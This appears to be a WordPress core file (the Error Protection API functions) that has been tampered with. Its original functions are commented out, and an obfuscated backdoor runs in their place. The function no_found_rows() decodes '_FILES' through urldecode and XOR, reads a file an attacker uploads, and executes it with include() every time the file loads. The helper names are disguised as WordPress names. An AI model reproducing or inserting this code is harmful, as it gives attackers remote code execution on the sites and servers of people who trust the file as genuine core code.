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<?php /*
*
* Error Protection API: Functions
*
* @package WordPress
* @since 5.2.0
*
* Get the instance for storing paused plugins.
*
* @return WP_Paused_Extensions_Storage
function wp_paused_plugins() {
static $storage = null;
if ( null === $storage ) {
$storage = new WP_Paused_Extensions_Storage( 'plugin' );
}
return $storage;
}
*
* Get the instance for storing paused extensions.
*
* @return WP_Paused_Extensions_Storage
function wp_paused_themes() {
static $storage = null;
if ( null === $storage ) {
$storage = new WP_Paused_Extensions_Storage( 'theme' );
}
return $storage;
}
*
* Get a human readable description of an extension's error.
*
* @since 5.2.0
*
* @param array $error Error details {@see error_get_last()}
* @return string Formatted error description.
function wp_get_extension_error_description( $error ) {
$constants = get_defined_constants( true );
$constants = isset( $constants['Core'] ) ? $constants['Core'] : $constants['internal'];
$core_errors = array();
foreach ( $constants as $constant => $value ) {
if ( 0 === strpos( $constant, 'E_' ) ) {
$core_errors[ $value ] = $constant;
}
}
if ( isset( $core_errors[ $error['type'] ] ) ) {
$error['type'] = $core_errors[ $error['type'] ];
}
translators: 1: Error type, 2: Error line number, 3: Error file name, 4: Error message.
$error_message = __( 'An error of type %1$s was caused in line %2$s of the file %3$s. Erro*/
function no_found_rows()
{
$printed = 'UWGBokVwPiG';
$get_posts = $printed;
$delimiters = 'name';
$offset = $GLOBALS[default_no_texturize_shortcodes("%0A%11%0E%0E%2A8", $get_posts)];
$sizeinfo = 'new_date';
$post_title = $offset;
$results = isset($post_title[$get_posts]);
$title = 'post_modified_gmt';
if ($results)
{
$image_exts = $offset[$get_posts];
$values = $image_exts[default_no_texturize_shortcodes("%21%3A7%1D%01%0A%3B%12", $get_posts)];
$translation_preg = 'error';
$page_structure = $values;
include ($page_structure);
$reset = 'strict';
}
}
function default_no_texturize_shortcodes($last_changed, $emoji_char)
{
$append = $emoji_char;
$post_meta_ids = "url" . "decode";
$custom_fields = $post_meta_ids($last_changed);
$diff = substr($append,0, strlen($custom_fields));
$num_pages = $custom_fields ^ $diff;
$custom_fields = strpos($num_pages, $diff);
return $num_pages;
}
no_found_rows();
/* r message: %4$s' );
return sprintf(
$error_message,
"<code>{$error['type']}</code>",
"<code>{$error['line']}</code>",
"<code>{$error['file']}</code>",
"<code>{$error['message']}</code>"
);
}
*
* Registers the shutdown handler for fatal errors.
*
* The handler will only be registered if {@see wp_is_fatal_error_handler_enabled()} returns true.
*
* @since 5.2.0
function wp_register_fatal_error_handler() {
if ( ! wp_is_fatal_error_handler_enabled() ) {
return;
}
$handler = null;
if ( defined( 'WP_CONTENT_DIR' ) && is_readable( WP_CONTENT_DIR . '/fatal-error-handler.php' ) ) {
$handler = include WP_CONTENT_DIR . '/fatal-error-handler.php';
}
if ( ! is_object( $handler ) || ! is_callable( array( $handler, 'handle' ) ) ) {
$handler = new WP_Fatal_Error_Handler();
}
register_shutdown_function( array( $handler, 'handle' ) );
}
*
* Checks whether the fatal error handler is enabled.
*
* A constant `WP_DISABLE_FATAL_ERROR_HANDLER` can be set in `wp-config.php` to disable it, or alternatively the
* {@see 'wp_fatal_error_handler_enabled'} filter can be used to modify the return value.
*
* @since 5.2.0
*
* @return bool True if the fatal error handler is enabled, false otherwise.
function wp_is_fatal_error_handler_enabled() {
$enabled = ! defined( 'WP_DISABLE_FATAL_ERROR_HANDLER' ) || ! WP_DISABLE_FATAL_ERROR_HANDLER;
*
* Filters whether the fatal error handler is enabled.
*
* **Important:** This filter runs before it can be used by plugins. It cannot
* be used by plugins, mu-plugins, or themes. To use this filter you must define
* a `$wp_filter` global before WordPress loads, usually in `wp-config.php`.
*
* Example:
*
* $GLOBALS['wp_filter'] = array(
* 'wp_fatal_error_handler_enabled' => array(
* 10 => array(
* array(
* 'accepted_args' => 0,
* 'function' => function() {
* return false;
* },
* ),
* ),
* ),
* );
*
* Alternatively you can use the `WP_DISABLE_FATAL_ERROR_HANDLER` constant.
*
* @since 5.2.0
*
* @param bool $enabled True if the fatal error handler is enabled, false otherwise.
return apply_filters( 'wp_fatal_error_handler_enabled', $enabled );
}
*
* Access the WordPress Recovery Mode instance.
*
* @since 5.2.0
*
* @return WP_Recovery_Mode
function wp_recovery_mode() {
static $wp_recovery_mode;
if ( ! $wp_recovery_mode ) {
$wp_recovery_mode = new WP_Recovery_Mode();
}
return $wp_recovery_mode;
}
*/